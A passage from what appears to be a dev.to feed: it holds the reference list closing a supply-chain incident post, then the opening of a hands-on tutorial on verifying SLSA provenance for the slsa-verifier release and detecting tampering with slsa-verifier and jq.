&lt;p&gt;Got an incident I should add, or a difference I called wrong? File on &lt;a href="https://github.com/0-draft/chainscope/issues" rel="noopener noreferrer"&gt;GitHub Issues&lt;/a&gt; or drop a comment.&lt;/p&gt;




&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.openwall.com/lists/oss-security/2024/03/29/4" rel="noopener noreferrer"&gt;Andres Freund disclosure (xz-utils CVE-2024-3094)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://research.swtch.com/xz-script" rel="noopener noreferrer"&gt;Russ Cox xz reconstruction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://unit42.paloaltonetworks.com/npm-supply-chain-attack/" rel="noopener noreferrer"&gt;Unit 42: Shai-Hulud npm worm&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.cisa.gov/news-events/alerts/2025/09/23/widespread-supply-chain-compromise-impacting-npm-ecosystem" rel="noopener noreferrer"&gt;CISA: Shai-Hulud alert&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.cisa.gov/news-events/alerts/2025/03/18/supply-chain-compromise-third-party-tj-actionschanged-files-cve-2025-30066-and-reviewdogaction" rel="noopener noreferrer"&gt;CISA: tj-actions/changed-files (CVE-2025-30066)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.wiz.io/blog/github-action-tj-actions-changed-files-supply-chain-attack-cve-2025-30066" rel="noopener noreferrer"&gt;Wiz: tj-actions analysis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://securitylabs.datadoghq.com/articles/litellm-compromised-pypi-teampcp-supply-chain-campaign/" rel="noopener noreferrer"&gt;Datadog Security Labs: TeamPCP / LiteLLM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.litellm.ai/blog/security-update-march-2026" rel="noopener noreferrer"&gt;LiteLLM official security update (March 2026)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.stepsecurity.io/blog/pgserve-compromised-on-npm-malicious-versions-harvest-credentials" rel="noopener noreferrer"&gt;StepSecurity: pgserve / CanisterSprawl&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://thehackernews.com/2026/04/self-propagating-supply-chain-worm.html" rel="noopener noreferrer"&gt;The Hacker News: self-propagating npm worm (pgserve)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/" rel="noopener noreferrer"&gt;CrowdStrike: SUNSPOT analysis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a" rel="noopener noreferrer"&gt;CISA: SolarWinds advisory&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>supplychain</category>
      <category>showdev</category>
    </item>
    <item>
      <title>SLSA Provenance Hands-on: Generate with GitHub Actions, Verify with slsa-verifier</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Wed, 29 Apr 2026 07:38:30 +0000</pubDate>
      <link>https://dev.to/kanywst/slsa-provenance-hands-on-generate-with-github-actions-verify-with-slsa-verifier-56ka</link>
      <guid>https://dev.to/kanywst/slsa-provenance-hands-on-generate-with-github-actions-verify-with-slsa-verifier-56ka</guid>
      <description>&lt;h1&gt;
  
  
  Introduction
&lt;/h1&gt;

&lt;p&gt;I wrote &lt;a href="https://dev.to/kanywst/supply-chain-security-a-deep-dive-into-sbom-and-code-signing-2n1l"&gt;Supply Chain Security: A Deep Dive into SBOM and Code Signing&lt;/a&gt; earlier. That post pinned down "what's in it" via SBOM and "who signed it" via Cosign.&lt;/p&gt;

&lt;p&gt;But even with both of those, there's still a hole.&lt;/p&gt;

&lt;p&gt;SolarWinds' &lt;strong&gt;SUNSPOT&lt;/strong&gt; was malware that lived on the build server, swapped the source code the moment a build started, and put it back when the build finished. The resulting binaries were signed with the legitimate certificate. Signatures: perfect. SBOMs: clean. And the world still got a backdoor distributed to it.&lt;/p&gt;

&lt;p&gt;Why? Signatures only prove "I signed this with this key." SBOMs only describe "what was in the artifact at build time." &lt;strong&gt;Nobody was verifying "was this really built from the right source, on an unaltered builder, following the steps it claims?"&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The thing that closes that hole is &lt;strong&gt;Provenance&lt;/strong&gt;. SLSA (Supply-chain Levels for Software Artifacts) is a framework built around provenance, treating "from where (source), how (build), by what (builder)" as verifiable metadata.&lt;/p&gt;

&lt;p&gt;I covered the spec in &lt;a href="https://dev.to/kanywst/slsa-deep-dive-securing-the-supply-chain-using-verifiable-levels-klk"&gt;SLSA Deep Dive&lt;/a&gt;. This is the follow-up: &lt;strong&gt;actually generating SLSA L3 provenance and verifying it on real machines&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;What we're doing:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Verify a public &lt;code&gt;slsa-verifier&lt;/code&gt; v2.7.1 release using its bundled provenance (and demonstrate tampering detection)&lt;/li&gt;
&lt;li&gt;Plug &lt;code&gt;slsa-github-generator&lt;/code&gt; into a Go project so that pushing a tag automatically emits SLSA L3 provenance&lt;/li&gt;
&lt;li&gt;Read the JSON inside and understand exactly what is being attested&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  Before you read on
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Provenance / Attestation / in-toto / DSSE
&lt;/h3&gt;

&lt;p&gt;The terminology is slippery, so let's pin it down first.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fei62txenvyrk9v4ow7p0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fei62txenvyrk9v4ow7p0.png" alt="Layer" width="539" height="824"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;in-toto Statement&lt;/strong&gt;: a JSON structure that says "for this subject (the artifact), I am stating this predicate (the claim)"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Attestation&lt;/strong&gt;: an in-toto Statement plus a signature. Any "signed claim about an artifact"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Provenance&lt;/strong&gt;: an attestation that specifically describes "how it was built" (&lt;code&gt;predicateType: https://slsa.dev/provenance/v1&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DSSE (Dead Simple Signing Envelope)&lt;/strong&gt;: an envelope format for signed JSON. The payload is base64-wrapped on the inside, and the signature wraps the outside&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;So a SLSA Provenance is "an in-toto Statement whose predicate matches the SLSA spec, signed inside a DSSE envelope."&lt;/p&gt;

&lt;h3&gt;
  
  
  SLSA Build Level cheat sheet
&lt;/h3&gt;

&lt;p&gt;Just enough to keep us oriented. For the threat model, see &lt;a href="https://dev.to/kanywst/slsa-deep-dive-securing-the-supply-chain-using-verifiable-levels-klk"&gt;SLSA Deep Dive&lt;/a&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Level&lt;/th&gt;
&lt;th&gt;What it guarantees&lt;/th&gt;
&lt;th&gt;Threats it stops&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;L1&lt;/td&gt;
&lt;td&gt;Provenance exists&lt;/td&gt;
&lt;td&gt;Almost nothing (essentially documentation)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;L2&lt;/td&gt;
&lt;td&gt;Provenance is signed&lt;/td&gt;
&lt;td&gt;Detects tampering during distribution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;L3&lt;/td&gt;
&lt;td&gt;Generated by a tamper-resistant build platform&lt;/td&gt;
&lt;td&gt;Stops everything short of builder compromise&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;code&gt;slsa-github-generator&lt;/code&gt;, the implementation we use here, is one of the few that actually clears L3. By leaning on GitHub's OIDC tokens and reusable workflows, it is structured so that user code cannot reach the builder's internal state.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why "reusable workflows" are the key to L3
&lt;/h3&gt;

&lt;p&gt;A GitHub Actions &lt;code&gt;uses: org/repo/.github/workflows/foo.yml@vX&lt;/code&gt; runs in a &lt;strong&gt;separate process, separate shell, separate filesystem&lt;/strong&gt; from the caller. So whatever the calling repo's owner puts in their YAML, they cannot touch the signing keys or OIDC tokens that the builder workflow handles.&lt;/p&gt;

&lt;p&gt;That structurally satisfies SLSA L3's requirement: &lt;strong&gt;"separate user-defined build steps (data plane) from the provenance generation logic (control plane)."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftjxy4yxf32qkvd0omzqe.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftjxy4yxf32qkvd0omzqe.png" alt="Workflow" width="800" height="168"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The user just calls in via &lt;code&gt;uses:&lt;/code&gt;. They never touch the provenance assembly. That structural split is the heart of L3.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. Verify a public artifact
&lt;/h2&gt;

&lt;p&gt;Theory only goes so far. Let's verify a real provenance on your machine first. Subject of choice: the &lt;code&gt;slsa-verifier&lt;/code&gt; release itself. Since &lt;code&gt;slsa-verifier&lt;/code&gt; is &lt;strong&gt;built with slsa-github-generator&lt;/strong&gt;, every release ships with &lt;code&gt;.intoto.jsonl&lt;/code&gt; alongside the binary.&lt;/p&gt;

&lt;h3&gt;
  
  
  Required tools
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# macOS&lt;/span&gt;
brew &lt;span class="nb"&gt;install &lt;/span&gt;slsa-verifier jq

&lt;span class="c"&gt;# version check&lt;/span&gt;
slsa-verifier version
&lt;span class="c"&gt;# slsa-verifier: Verify SLSA provenance for Github Actions&lt;/span&gt;
&lt;span class="c"&gt;# GitVersion:    2.7.1&lt;/span&gt;
&lt;span class="c"&gt;# GitCommit:     Homebrew&lt;/span&gt;
&lt;span class="c"&gt;# GitTreeState:  clean&lt;/span&gt;
&lt;span class="c"&gt;# BuildDate:     2025-06-25T21:09:44Z&lt;/span&gt;
&lt;span class="c"&gt;# GoVersion:     go1.25.5&lt;/span&gt;
&lt;span class="c"&gt;# Compiler:      gc&lt;/span&gt;
&lt;span class="c"&gt;# Platform:      darwin/arm64&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 1: Download the artifact and its provenance
&lt;/h3&gt;

&lt;p&gt;A one-shot script that runs everything in this section lives at &lt;a href="https://github.com/0-draft/hello-slsa/blob/main/verify-real-artifact/run.sh" rel="noopener noreferrer"&gt;&lt;code&gt;hello-slsa/verify-real-artifact/run.sh&lt;/code&gt;&lt;/a&gt;. If you just want to see the flow, clone the repo and run &lt;code&gt;./run.sh&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;mkdir &lt;/span&gt;slsa-hands-on &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;cd &lt;/span&gt;slsa-hands-on

&lt;span class="c"&gt;# the artifact itself&lt;/span&gt;
curl &lt;span class="nt"&gt;-sLO&lt;/span&gt; https://github.com/slsa-framework/slsa-verifier/releases/download/v2.7.1/slsa-verifier-darwin-arm64

&lt;span class="c"&gt;# its provenance (in-toto Statement, wrapped in a DSSE envelope)&lt;/span&gt;
curl &lt;span class="nt"&gt;-sLO&lt;/span&gt; https://github.com/slsa-framework/slsa-verifier/releases/download/v2.7.1/slsa-verifier-darwin-arm64.intoto.jsonl

&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-la&lt;/span&gt;
&lt;span class="c"&gt;# -rw-r--r-- 1 user staff   32M slsa-verifier-darwin-arm64&lt;/span&gt;
&lt;span class="c"&gt;# -rw-r--r-- 1 user staff  17K slsa-verifier-darwin-arm64.intoto.jsonl&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 2: Verification command
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;slsa-verifier verify-artifact slsa-verifier-darwin-arm64 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--provenance-path&lt;/span&gt; slsa-verifier-darwin-arm64.intoto.jsonl &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--source-uri&lt;/span&gt; github.com/slsa-framework/slsa-verifier &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--source-tag&lt;/span&gt; v2.7.1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Verified signature against tlog entry index 253498016 at URL: https://rekor.sigstore.dev/api/v1/log/entries/108e9186e8c5677a2ae86cf78d97874465b3150b3a30474f101c0ca4f916e78cd89ab8dcf6f2c927
Verified build using builder "https://github.com/slsa-framework/slsa-github-generator/.github/workflows/builder_go_slsa3.yml@refs/tags/v2.0.0" at commit ea584f4502babc6f60d9bc799dbbb13c1caa9ee6
Verifying artifact slsa-verifier-darwin-arm64: PASSED

PASSED: SLSA verification passed
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Let's unpack what just happened.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmgjaldsyt8ax8d3ibbct.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmgjaldsyt8ax8d3ibbct.png" alt="verification" width="800" height="682"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Two things to notice.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;No keys on your machine.&lt;/strong&gt; The verifier reaches Rekor (transparency log) and Fulcio (CA) to validate the certificate chain that was used at signing time. Same mechanism as Cosign keyless signing.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;--source-uri&lt;/code&gt; and &lt;code&gt;--source-tag&lt;/code&gt; are inputs you provide.&lt;/strong&gt; "I want to trust this binary as coming from this repo at this tag" is a human-driven assertion, and it gets checked against what the provenance actually says.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;To see what happens when the assertion is wrong, point &lt;code&gt;--source-tag&lt;/code&gt; at a different tag.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;slsa-verifier verify-artifact slsa-verifier-darwin-arm64 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--provenance-path&lt;/span&gt; slsa-verifier-darwin-arm64.intoto.jsonl &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--source-uri&lt;/span&gt; github.com/slsa-framework/slsa-verifier &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--source-tag&lt;/span&gt; v2.7.0      &lt;span class="c"&gt;# ← wrong tag&lt;/span&gt;

&lt;span class="c"&gt;# FAILED: SLSA verification failed:&lt;/span&gt;
&lt;span class="c"&gt;#   expected tag 'v2.7.0', got 'v2.7.1':&lt;/span&gt;
&lt;span class="c"&gt;#   tag used to generate the binary does not match provenance&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 3: Detect tampering
&lt;/h3&gt;

&lt;p&gt;Mutate the artifact by a single byte and try again.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"broken"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; slsa-verifier-darwin-arm64

slsa-verifier verify-artifact slsa-verifier-darwin-arm64 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--provenance-path&lt;/span&gt; slsa-verifier-darwin-arm64.intoto.jsonl &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--source-uri&lt;/span&gt; github.com/slsa-framework/slsa-verifier &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--source-tag&lt;/span&gt; v2.7.1

&lt;span class="c"&gt;# FAILED: SLSA verification failed:&lt;/span&gt;
&lt;span class="c"&gt;#   expected hash '424efd44128c51af49affd87bd3f0476eaab0a3e77ed1fee0ca7186c569b5388' not found:&lt;/span&gt;
&lt;span class="c"&gt;#   artifact hash does not match provenance subject&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The hash mismatch fails immediately. SUNSPOT-style attacks ("swap the binary after the build finishes") die right here.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 4: Look inside the provenance
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;.intoto.jsonl&lt;/code&gt; is a DSSE envelope; the payload is base64-encoded JSON. Pry it open with &lt;code&gt;jq&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;slsa-verifier-darwin-arm64.intoto.jsonl &lt;span class="se"&gt;\&lt;/span&gt;
  | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.payload'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | &lt;span class="nb"&gt;base64&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | jq &lt;span class="s1"&gt;'{_type, predicateType, subject, predicate: {builder: .predicate.builder, buildType: .predicate.buildType, configSource: .predicate.invocation.configSource}}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Trimmed output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"_type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://in-toto.io/Statement/v0.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"predicateType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://slsa.dev/provenance/v0.2"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"subject"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"slsa-verifier-darwin-arm64"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"sha256"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"39abfcf5f1d690c3e889ce3d2d6a8b87711424d83368511868d414e8f8bcb05c"&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"predicate"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"builder"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"id"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://github.com/slsa-framework/slsa-github-generator/.github/workflows/builder_go_slsa3.yml@refs/tags/v2.0.0"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"buildType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://github.com/slsa-framework/slsa-github-generator/go@v1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"configSource"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"uri"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"git+https://github.com/slsa-framework/slsa-verifier@refs/tags/v2.7.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"sha1"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ea584f4502babc6f60d9bc799dbbb13c1caa9ee6"&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"entryPoint"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;".github/workflows/release.yml"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;What each field means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;subject&lt;/code&gt;&lt;/strong&gt;: "this provenance is making a statement about this binary." If the &lt;code&gt;name&lt;/code&gt; and SHA256 don't match the artifact, verification fails.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;predicate.builder.id&lt;/code&gt;&lt;/strong&gt;: who built it (which reusable workflow). The tag is included, so the builder version itself is pinned.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;predicate.buildType&lt;/code&gt;&lt;/strong&gt;: build kind (Go binary, container, etc.).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;predicate.invocation.configSource&lt;/code&gt;&lt;/strong&gt;: source repo plus the GitHub Actions workflow file that drove the build. &lt;code&gt;digest.sha1&lt;/code&gt; pins the commit, so even an attack that rewrites the contents of the v2.7.1 tag after the fact does not slip through.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The &lt;code&gt;environment&lt;/code&gt; block has an even finer fingerprint of where the build ran.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;slsa-verifier-darwin-arm64.intoto.jsonl | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.payload'&lt;/span&gt; | &lt;span class="nb"&gt;base64&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | jq &lt;span class="s1"&gt;'.predicate.invocation.environment | {github_event_name, github_ref, github_repository_owner, github_run_id, github_sha1, os}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"github_event_name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"push"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"github_ref"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"refs/tags/v2.7.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"github_repository_owner"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"slsa-framework"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"github_run_id"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"15930257685"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"github_sha1"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ea584f4502babc6f60d9bc799dbbb13c1caa9ee6"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"os"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ubuntu24"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;which GitHub event (&lt;code&gt;push&lt;/code&gt;) fired the workflow&lt;/li&gt;
